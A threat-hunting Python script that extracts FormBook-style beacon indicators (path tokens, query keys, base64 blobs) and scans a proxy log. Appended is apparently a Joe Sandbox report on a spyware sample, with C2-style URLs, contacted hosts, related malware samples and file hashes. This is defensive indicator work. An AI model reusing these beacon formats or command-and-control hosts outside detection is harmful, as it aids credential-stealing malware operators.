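B64_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")   # base64-looking payload (assumed minimum 64 chars)
ID_RE = re.compile(r"^[A-Za-z0-9]{4,32}$")           # short alphanumeric identifier

BLOB_A = ("CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/"
          "hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c=")

SAMPLE_URLS = [  # copied from the report's URL tables
    "http://www.shenzhoucui.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=" + BLOB_A,
    "http://www.donnavariedades.com/fo8o/?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49"
    "ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp2",
    "http://www.techchains.info/fo8o/",
    "https://duckduckgo.com/ac/?q=",
    "https://www.reg.com/domain/prolong_period_anonymous?dname=www.b301.space&utm_source=www.b301.space",
]


def split_query(query):
    """Split key=value pairs by hand: urllib's parse_qs would turn the '+'
    characters inside the base64 payload into spaces and break the match."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def classify_url(url):
    """Return the beacon shape of url, or None when it does not fit.

    Fit means exactly one short path segment and either no query (the bare
    /fo8o/ form) or exactly two parameters: one short id and one base64 blob."""
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    if len(segments) != 1 or not PATH_TOKEN_RE.match(segments[0]):
        return None
    info = {"host": parts.hostname, "path_token": segments[0], "beacon": False,
            "id_key": None, "blob_key": None, "id": None}
    if not parts.query:
        return info
    pairs = split_query(parts.query)
    blobs = [(k, v) for k, v in pairs if B64_RE.match(v) and len(v) % 4 == 0]
    ids = [(k, v) for k, v in pairs if ID_RE.match(v)]
    if len(pairs) != 2 or len(blobs) != 1 or len(ids) != 1:
        return None
    info.update(beacon=True, id_key=ids[0][0], blob_key=blobs[0][0], id=ids[0][1])
    return info


def iocs_from_report(urls):
    """Hosts grouped by path token, plus the (id key, blob key) pairs seen in beacons."""
    hosts = defaultdict(set)
    key_pairs = set()
    for url in urls:
        info = classify_url(url)
        if info is None:
            continue
        hosts[info["path_token"]].add(info["host"])
        if info["beacon"]:
            key_pairs.add((info["id_key"], info["blob_key"]))
    return {token: sorted(h) for token, h in hosts.items()}, key_pairs


def scan_proxy_log(lines, known_tokens, known_key_pairs):
    """Flag requests by known path token first, then by known query keys on a
    new host; a beacon-shaped query with unknown keys is only a hunting lead.
    Line format is constructed for this example: '<ts> <client> <method> <url>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue
        ts, client, _method, url = fields
        info = classify_url(url)
        if info is None:
            continue
        if info["path_token"] in known_tokens:
            reason = "known path token"
        elif info["beacon"] and (info["id_key"], info["blob_key"]) in known_key_pairs:
            reason = "known query keys, new host"
        elif info["beacon"]:
            reason = "beacon-shaped query (lead only)"
        else:
            continue
        hits.append({"ts": ts, "client": client, "host": info["host"], "reason": reason})
    return hits


PROXY_LOG = [  # constructed for this example; the second host is not in the report
    "2024-08-02T11:52:01Z 10.0.0.5 GET http://www.liangyuen528.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=" + BLOB_A,
    "2024-08-02T11:52:03Z 10.0.0.5 GET http://rotated-host.invalid/h2k1/?Ixe=Apq4tPPXNdTp2&blWd=" + BLOB_A,
    "2024-08-02T11:52:05Z 10.0.0.7 GET https://duckduckgo.com/ac/?q=weather",
    "2024-08-02T11:52:09Z 10.0.0.7 GET https://code.jquery.com/jquery-3.7.1.min.js",
]

if __name__ == "__main__":
    grouped, keys = iocs_from_report(SAMPLE_URLS)
    print(grouped, keys)
    for hit in scan_proxy_log(PROXY_LOG, set(grouped), keys):
        print(hit)
```

The domain list alone is a weak indicator here because the sample rotates across many hosts, most of them parked or otherwise unrelated to the operator; the path token and the query-key pair survive that rotation, which is why the scanner keys on them before it keys on the host.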
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown |
| https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown |
| https://www.reg.com/domain/prolong_period_anonymous?dname=www.b301.space&utm_source=www.b301.space&u | netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://yourmine.ru/i/parking/glob_parking.png | netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown |
| https://www.value-domain.com/ | netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown |
| https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png | netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | netbtugc.exe, 00000004.00000002.4580387603.00000000042EE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4582252078.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003D4E000.00000004.00000001.00040000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown |
| https://www.google.com | netbtugc.exe, 00000004.00000002.4582252078.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000484C000.00000004.00000001.00040000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://2domains.ru/ | netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand= | netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://2domains.ru | netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.ecosia.org/newtab/ | netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.empowermedeco.com/fo8o/?blWd=mxnR | netbtugc.exe, 00000004.00000002.4580387603.0000000004C5A000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.00000000046BA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| http://www.b301.space/ | netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://code.jquery.com/jquery-3.7.1.min.js | netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.sedo.com/services/parking.php3 | WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003D4E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://codepen.io/uzcho_/pens/popular/?grid_type=list | netbtugc.exe, 00000004.00000002.4580387603.0000000004612000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004072000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.reg.com/domain/service/domain-broker?dname=www.b301.space&utm_source=www.b301.space&utm_ | WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://codepen.io/uzcho_/pen/eYdmdXw.css | netbtugc.exe, 00000004.00000002.4580387603.0000000004612000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004072000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.reg.com/domain/new/rereg_details?dname=www.b301.space&utm_source=www.b301.space&utm_medi | netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://rakkoma.com/ | WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.value-domain.com/modall.php | WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.b301.space | WOaBXdWwIJKzuV.exe, 00000008.00000002.4581093569.000000000561F000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://reg.ru?target=_blank | netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | false |
| 15.197.240.20 | www.donnavariedades.com | United States | 7430 | TANDEMUS | false |
| 52.25.92.0 | www.kasegitai.tokyo | United States | 16509 | AMAZON-02US | false |
| 116.50.37.244 | www.goldenjade-travel.com | Taiwan; Republic of China (ROC) | 18046 | DONGFONG-TWDongFongTechnologyCoLtdTW | false |
| 199.59.243.226 | unknown | United States | 395082 | BODIS-NJUS | false |
| 85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false |
| 66.29.149.46 | www.techchains.info | United States | 19538 | ADVANTAGECOMUS | false |
| 72.52.178.23 | www.shenzhoucui.com | United States | 32244 | LIQUIDWEBUS | false |
| 154.215.72.110 | www.3xfootball.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false |
| 195.110.124.133 | elettrosistemista.zip | Italy | 39729 | REGISTER-ASIT | false |
| 194.67.71.191 | www.b301.space | Russian Federation | 197695 | AS-REGRU | false |
| 46.30.211.38 | www.antonio-vivaldi.mobi | Denmark | 51468 | ONECOMDK | false |
| 15.197.172.60 | www.liangyuen528.com | United States | 7430 | TANDEMUS | false |
| 217.196.55.202 | empowermedeco.com | Norway | 29300 | AS-DIRECTCONNECTNO | false |
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1486705
            Start date and time:2024-08-02 13:49:33 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 10m 49s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:2
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:QLLafoDdqv.exe
            renamed because original name is a hash value
            Original Sample Name:16a3ae414f6303383d089b24318edcedb5891f081108035ee2017c3a61ab0012.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@7/5@18/14
            EGA Information:
            • Successful, ratio: 75%
            HCA Information:
            • Successful, ratio: 91%
            • Number of executed functions: 50
            • Number of non-executed functions: 283
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            Time | Type | Description
            07:51:14 | API Interceptor | 11427540x Sleep call for process: netbtugc.exe modified
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            91.195.240.94 | bum2sl4tSW66Q5O.exe | malicious | FormBook, PureLog Stealer
            • www.seancollinsmusic.com/ps15/?t8o4=IiUdWomF5k9qaWufAEOF1gY9kHVftwkJ6cV9tSoeDtYAHjCeVDLi568qZcu0mi0k9Trm&jPj8q=pFQLwhtH0
            91.195.240.94 | 5.exe | malicious | FormBook
            • www.nadiiadrinkscoffee.com/ge34/?Hp=X6AHZfrXbRHH7xE&pP=DtaDJi3z2nipX4nJS/IcJCcbDk/4k1gE0+TxNtH8tFZPjGhx/2qD/OBkCIHBCYb1eipf
            91.195.240.94 | factura.exe | malicious | FormBook
            • www.ssgame56c.org/qpcj/?IVD=vTEpW4TmB&PCKydxRp=hXmtMExE2v9HEeiW+ulHLkzTySI3TL5baDMJUDroKowqF3JNdygLwqeM0chXN5g2/8j8rpp6Ovu5nc6C/eq8J6bvYVTB8B/ZOQ8YY77+xTTm
            91.195.240.94 | Document TOP19928.exe | malicious | FormBook
            • www.rssnewscast.com/fo8o/
            91.195.240.94 | wOoESPII08.exe | malicious | FormBook
            • www.rssnewscast.com/fo8o/?xVY=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&Nz=LPhpDRap3
            91.195.240.94 | opp46lGmxd.exe | malicious | FormBook
            • www.rssnewscast.com/fo8o/
            91.195.240.94 | mzrHGroQZy.hta | malicious | FormBook
            • www.rssnewscast.com/fo8o/
            91.195.240.94 | j5Gx6UXYOm.exe | malicious | FormBook
            • www.rssnewscast.com/fo8o/
            91.195.240.94 | 5fG4r07BPy.exe | malicious | FormBook
            • www.rssnewscast.com/fo8o/
            91.195.240.94 | eGHWPCyhLI.exe | malicious | FormBook
            • www.rssnewscast.com/fo8o/
            15.197.240.20 | LF2024022.exe | malicious | FormBook, PureLog Stealer
            • www.johnasian.com/jn17/?AjFxkn=AUopA6EtHNKAXsGcnergFbbGiEMiDoIvdiVznSugjPZqqO5N3A9xjJjKmrW26oeiLAOH&Yxl0T=CPqtRfop
            15.197.240.20 | UAyH98ukuA.exe | malicious | FormBook
            • www.id91920.com/fs83/?K6kd=8lIozjCqSLfPDorgIcX1ftJlpRSaTueiBgmxgg5HldscziyRpsyXpMHH8F7QpJEOuhLDcFmkzQ==&uTrL=_bj8lfEpU
            15.197.240.20 | 240330_unpacked | malicious | Unknown
            • pimphattana.com/
            52.25.92.0 | 0yt33vmRtD.exe | malicious | FormBook Neshta
            • www.rnerfrfw5z3ki.net/b6a4/?n4kHS=A454S8wp36rH&2dL8=855Z9vQ7KQBH7oBfYdONeB9yi8X3cSgRKy0xE8QF2gCXapWwl6B6GqyWE2Zu86OSM4IC
            52.25.92.0 | tgamf4XuLa.exe | malicious | FormBook
            • www.cherrybunk.life/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz
            52.25.92.0 | MPTsTltrWeIcZA6.exe | malicious | FormBook
            • www.cramp99039.com/p90g/?z8Ot4=BQK+uzRXfeoKHAmncS2k8OhUXVZO9n/JmDrsHgUuptWL9V6x8DaM5zkP6DGZ1NXNs3fF&oVwPK=EpHT8DAPUNoD_h
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            natroredirect.natrocdn.com | 6ddrUd6iQo.exe | malicious | FormBook
            • 85.159.66.93
            natroredirect.natrocdn.com | Enquiry24-789.exe | malicious | FormBook
            • 85.159.66.93
            natroredirect.natrocdn.com | SOA.exe | malicious | FormBook
            • 85.159.66.93
            natroredirect.natrocdn.com | draft Proforma Invoice.exe | malicious | FormBook
            • 85.159.66.93
            natroredirect.natrocdn.com | Purchase Order 2.exe | malicious | FormBook
            • 85.159.66.93
            natroredirect.natrocdn.com | A.W.B.exe | malicious | FormBook
            • 85.159.66.93
            natroredirect.natrocdn.com | TT Application copy.exe | malicious | FormBook
            • 85.159.66.93
            natroredirect.natrocdn.com | PO 1024.exe | malicious | FormBook
            • 85.159.66.93
            natroredirect.natrocdn.com | SecuriteInfo.com.Win32.PWSX-gen.18110.20008.exe | malicious | FormBook
            • 85.159.66.93
            natroredirect.natrocdn.com | nK1Y86mbzfbkwpB.exe | malicious | FormBook, PureLog Stealer
            • 85.159.66.93
            www.kasegitai.tokyo | Document TOP19928.exe | malicious | FormBook
            • 202.172.28.202
            www.kasegitai.tokyo | wOoESPII08.exe | malicious | FormBook
            • 202.172.28.202
            www.kasegitai.tokyo | opp46lGmxd.exe | malicious | FormBook
            • 202.172.28.202
            www.kasegitai.tokyo | mzrHGroQZy.hta | malicious | FormBook
            • 202.172.28.202
            www.kasegitai.tokyo | j5Gx6UXYOm.exe | malicious | FormBook
            • 202.172.28.202
            www.kasegitai.tokyo | 5fG4r07BPy.exe | malicious | FormBook
            • 202.172.28.202
            www.kasegitai.tokyo | eGHWPCyhLI.exe | malicious | FormBook
            • 202.172.28.202
            www.kasegitai.tokyo | Z1glGeDwjL.exe | malicious | FormBook
            • 202.172.28.202
            www.kasegitai.tokyo | 9KBARIRa8X.exe | malicious | FormBook
            • 202.172.28.202
            www.kasegitai.tokyo | N2sgk6jMa2.exe | malicious | FormBook
            • 202.172.28.202
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            TANDEMUS | https://www.globalepic.co.kr/view.php?ud=202408011057515744edd3030223_29 | malicious | Unknown
            • 15.197.193.217
            TANDEMUS | http://telstra-103141.weeblysite.com/ | malicious | Unknown
            • 15.197.193.217
            TANDEMUS | http://telstra-107250.weeblysite.com/ | malicious | HTMLPhisher
            • 15.197.193.217
            TANDEMUS | http://telstra-108674.weeblysite.com/ | malicious | Unknown
            • 15.197.193.217
            TANDEMUS | http://att-yahoo-103994.weeblysite.com/ | malicious | Unknown
            • 15.197.193.217
            TANDEMUS | http://home-101446.weeblysite.com/ | malicious | Unknown
            • 15.197.193.217
            TANDEMUS | http://telstra-104348.weeblysite.com/ | malicious | Unknown
            • 15.197.193.217
            TANDEMUS | b2bXo6vmDm.exe | malicious | SystemBC
            • 15.197.130.221
            TANDEMUS | https://worker-muddy-mud-21e4.jm-database.workers.dev/account/create?.intl=us&.lang=en-us&sr | malicious | HTMLPhisher
            • 15.197.193.217
            TANDEMUS | http://onlineloginportal.com | malicious | Unknown
            • 15.197.193.217
            AMAZON-02US | Uw0VH7yLVB.elf | malicious | Mirai
            • 13.49.131.155
            AMAZON-02US | https://kplparis.freshdesk.com/en/support/solutions/articles/154000170570-facture-n-%C2%BA-fc-2024-013 | malicious | Unknown
            • 52.216.219.8
            AMAZON-02US | rOhEtfiB9i.elf | malicious | Mirai, Gafgyt, Moobot, Okiru
            • 54.94.188.187
            AMAZON-02US | Comprovativo_Julho_sa_12-07-2024_38.vbs | malicious | Unknown
            • 52.219.232.162
            AMAZON-02US | pxkt5csAI0.elf | malicious | Mirai, Gafgyt, Okiru
            • 54.171.230.55
            AMAZON-02US | 3AV1PyEQ16.elf | malicious | Unknown
            • 44.241.220.36
            AMAZON-02US | XtkUbewN09.elf | malicious | Mirai, Moobot
            • 52.29.59.141
            AMAZON-02US | https://markeertrafficservicebv6t3etwyghdsbn.dorik.io/ | malicious | Unknown
            • 3.131.225.83
            AMAZON-02US | https://forms.office.com/e/0Z5hR0x9HM | malicious | Unknown
            • 108.138.26.11
            AMAZON-02US | https://workdrive.zohopublic.eu/file/1n0t05e999a7f921c44b69aef1f2423b63f55 | malicious | Unknown
            • 18.245.31.24
            SEDO-ASDE | #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exe | malicious | FormBook
            • 91.195.240.19
            SEDO-ASDE | Wquyc7Qwqh.exe | malicious | FormBook
            • 91.195.240.19
            SEDO-ASDE | http://boovefunding.today | malicious | Unknown
            • 91.195.240.19
            SEDO-ASDE | r777528623004-FedEx-Shipping-Label.exe | malicious | FormBook
            • 91.195.240.19
            SEDO-ASDE | #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exe | malicious | FormBook
            • 91.195.240.19
            SEDO-ASDE | #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exe | malicious | FormBook
            • 91.195.240.19
            SEDO-ASDE | #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exe | malicious | FormBook
            • 91.195.240.19
            SEDO-ASDE | LisectAVT_2403002A_87.exe | malicious | FormBook
            • 91.195.240.19
            SEDO-ASDE | LisectAVT_2403002B_309.exe | malicious | Bdaejec, FormBook
            • 91.195.240.19
            SEDO-ASDE | LisectAVT_2403002B_412.exe | malicious | FormBook
            • 91.195.240.19
            No context
            No context
            Process:C:\Windows\SysWOW64\netbtugc.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1239949490932863
            Encrypted:false
            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
            MD5:271D5F995996735B01672CF227C81C17
            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
            Malicious:false
            Reputation:moderate, very likely benign file
            Process:C:\Users\user\Desktop\QLLafoDdqv.exe
            File Type:data
            Category:dropped
            Size (bytes):270848
            Entropy (8bit):7.993405556885437
            Encrypted:true
            SSDEEP:6144:8mp6/mWhgpoCnXGEAZQRbnavaBPjaKDb9yKueJW4:8mpgnhgfGlobnavkPjDt
            MD5:3A65F7BF1710AD9A746D1BDF4A8D704A
            SHA1:A861C26090AA755712061A001CCFA90FE7A80B87
            SHA-256:C8B12447F6D3A523E36A52D3C35DDB849011B5076C0CBE690EF3AB28A189A660
            SHA-512:5AE564DB8BAF2078F6A72EF8109291A21DA1CC45CA39E57FE45776AA45031C2F23AFEF006F2E09DE708E4ACB5A0079CDD462DDA9155A08BCF7872DABE3EA574E
            Malicious:false
            Reputation:low
            Process:C:\Users\user\Desktop\QLLafoDdqv.exe
            File Type:data
            Category:dropped
            Size (bytes):9750
            Entropy (8bit):7.642449326057744
            Encrypted:false
            SSDEEP:192:Z6E+bT+X/8ER7PVz6sNiDrFdZMecXWHLy7DdWtb/ZmuYQX:Z6dwXRhNiHBy7Di7ZnY2
            MD5:85697B3DDA09976C8FD29C7A3C3EE6C7
            SHA1:D474B724CE1DF2C4D258C6B4388BD5B7C748FB9F
            SHA-256:721EE4A1A6F496509654620BFFEE1C82C824CE9CA9EDBC89161915B63E94A8DE
            SHA-512:32EC2912548C332B5602B5DB0B52761B706575185613546056390C0122F2633FE47B405FB448974860200515BB47820553F70F43886A3F36E370DD7D7C71365C
            Malicious:false
            Reputation:low
            Process:C:\Users\user\Desktop\QLLafoDdqv.exe
            File Type:ASCII text, with very long lines (28674), with no line terminators
            Category:dropped
            Size (bytes):28674
            Entropy (8bit):3.5800014050641975
            Encrypted:false
            SSDEEP:768:JxBr6ScFCo3T3iC+vt63YntRUu+nZ+nskm/Wsl2HzpmL5sCWi:Zr6ScFCo3T3i3vt63YntRUu+nZ+nskm9
            MD5:B9B2D0603A8B163CA997D551FB01BAE8
            SHA1:8083CA0BF1CE3E9A477B58A3927CDA2240DA6177
            SHA-256:66EE8EE4109C4CEFA994748F2AC8BB2057E4FED3947216FB33C7A65B014E884E
            SHA-512:F182362C40A0E0672C4C013A9E1D89E3BA033D44FDC25EEA77D2E6E972230A04F1977CA631F6151D6AE0A50012EB1C9010AD3F501F042E108F5B40673291F7CC
            Malicious:false
            Reputation:low
            Process:C:\Users\user\Desktop\QLLafoDdqv.exe
            File Type:data
            Category:dropped
            Size (bytes):270848
            Entropy (8bit):7.993405556885437
            Encrypted:true
            SSDEEP:6144:8mp6/mWhgpoCnXGEAZQRbnavaBPjaKDb9yKueJW4:8mpgnhgfGlobnavkPjDt
            MD5:3A65F7BF1710AD9A746D1BDF4A8D704A
            SHA1:A861C26090AA755712061A001CCFA90FE7A80B87
            SHA-256:C8B12447F6D3A523E36A52D3C35DDB849011B5076C0CBE690EF3AB28A189A660
            SHA-512:5AE564DB8BAF2078F6A72EF8109291A21DA1CC45CA39E57FE45776AA45031C2F23AFEF006F2E09DE708E4ACB5A0079CDD462DDA9155A08BCF7872DABE3EA574E
            Malicious:false
            Reputation:low
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.112429813049341
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:QLLafoDdqv.exe
            File size:1'229'824 bytes
            MD5:9f295f94dfaf4a72ef4aaa28e15543f5
            SHA1:5708ab5bfabaa81d29709fabdd08aa8ba5891d47
            SHA256:16a3ae414f6303383d089b24318edcedb5891f081108035ee2017c3a61ab0012
            SHA512:fc35c5de062664fe3733558d05e58ff3c5312c6fcee7c8aa7e6a32fb89de8f7b69993aff82aaa3f72fec305e4d7b1d1c70e8cf30cd0bc4b5dd758b3cca5df824
            SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSufeTei97aii:NTvC/MTQYxsWR7aSufeai
            TLSH:4845C00273C1D062FF9B91334F5AF61157BC69260123AA2F13A81DB9BE705B1563E7A3
            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
            Icon Hash:aaf3e3e3938382a0
            Entrypoint:0x420577
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
